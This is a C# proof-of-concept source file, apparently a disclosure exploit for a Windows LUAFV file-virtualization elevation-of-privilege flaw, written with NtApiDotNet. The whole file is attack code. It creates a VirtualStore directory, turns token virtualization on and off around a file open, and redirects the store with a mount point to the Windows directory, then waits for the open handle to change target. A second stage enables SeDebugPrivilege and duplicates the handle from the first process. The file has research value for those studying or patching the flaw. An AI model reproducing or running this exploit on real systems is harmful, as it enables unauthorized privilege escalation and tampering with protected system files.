﻿using NtApiDotNet;
using System;
using System.IO;
using System.Text;
using System.Threading;

namespace PoC_LUAFV_CrossProcess_EoP
{
    class Program
    {
        static void CreateFileWithSecurity(string target_path, string sddl, string data)
        {
            SecurityDescriptor sd = string.IsNullOrEmpty(sddl) ? null : new SecurityDescriptor(sddl);
            using (var obja = new ObjectAttributes(target_path, AttributeFlags.CaseInsensitive, (NtObject)null, null, sd))
            {
                using (var file = NtFile.Create(obja,
                        FileAccessRights.WriteData, 0, 0, FileOpenOptions.NonDirectoryFile, FileDisposition.Create, null))
                {
                    if (!string.IsNullOrEmpty(data))
                    {
                        file.Write(Encoding.ASCII.GetBytes(data), 0);
                    }
                    Console.WriteLine("Created Target Path: {0}", target_path);
                }
            }
        }

        static string CreateVirtualStore(string target_path)
        {
            string base_path = target_path.Substring(target_path.IndexOf(':') + 2);
            string virtual_path = Path.Combine(
                Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
                "VirtualStore", base_path);
            
            Console.WriteLine("Virtual Path: {0}", virtual_path);
            Directory.CreateDirectory(virtual_path);
            return virtual_path;
        }

        static void CreateSymlink(string virtual_path)
        {
            string windows_path = Environment.GetFolderPath(Environment.SpecialFolder.Windows);
            NtFile.CreateMountPoint(NtFileUtils.DosFileNameToNt(virtual_path), NtFileUtils.DosFileNameToNt(windows_path), string.Empty);
        }

        static void SetVirtualization(bool enable)
        {
            using (var token = NtToken.OpenProcessToken())
            {
                token.VirtualizationEnabled = enable;
            }
        }

        static void OpenFileForVirtualization()
        {
            // Setup the file path.
            string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "luafv_" + Guid.NewGuid());
            Console.WriteLine("Base Path: {0}", base_path);
            Directory.CreateDirectory(base_path);
            string target_path = NtFileUtils.DosFileNameToNt(Path.Combine(base_path, "dummy.txt"));
            var virtual_path = CreateVirtualStore(base_path);

            CreateFileWithSecurity(target_path, "D:(A;;GR;;;WD)(A;;GA;;;BA)", "This is a dummy file\r\n");
            SetVirtualization(true);

            using (var file = NtFile.Open(target_path, null, FileAccessRights.WriteAttributes,
                FileShareMode.Read, FileOpenOptions.NonDirectoryFile))
            {
                SetVirtualization(false);
                string full_path = file.FullPath;
                Console.WriteLine("File Before: {0} {1}", full_path, file.GrantedAccess);
                Console.WriteLine("Re-run the PoC as an admin with arguments - {0} {1}", 
                    NtProcess.Current.ProcessId, file.Handle.DangerousGetHandle());
                CreateSymlink(virtual_path);

                while (true)
                {
                    if (!file.FullPath.Equals(full_path, StringComparison.OrdinalIgnoreCase))
                    {
                        break;
                    }
                    Thread.Sleep(1000);
                }
                Console.WriteLine("File Changed to: {0} {1}", file.FullPath, file.GrantedAccess);
            }
        }

        static void OpenFileHandle(int pid, int handle)
        {
            using (var token = NtToken.OpenProcessToken())
            {
                token.SetPrivilege(TokenPrivilegeValue.SeDebugPrivilege, PrivilegeAttributes.Enabled);
            }

            using (var file = NtFile.DuplicateFrom(pid, new IntPtr(handle)))
            {
                var status = file.FsControl(NtWellKnownIoControlCodes.FSCTL_GET_COMPRESSION, new byte[0], 0, false);
                if (status.Status != NtStatus.STATUS_INVALID_USER_BUFFER)
                {
                    Console.WriteLine("Error: FS request with result {0}", status.Status);
                }
                else
                {
                    Console.WriteLine("Success");
                }
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length != 2)
                {
                    OpenFileForVirtualization();
                }
                else
                {
                    OpenFileHandle(int.Parse(args[0]), int.Parse(args[1]));
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
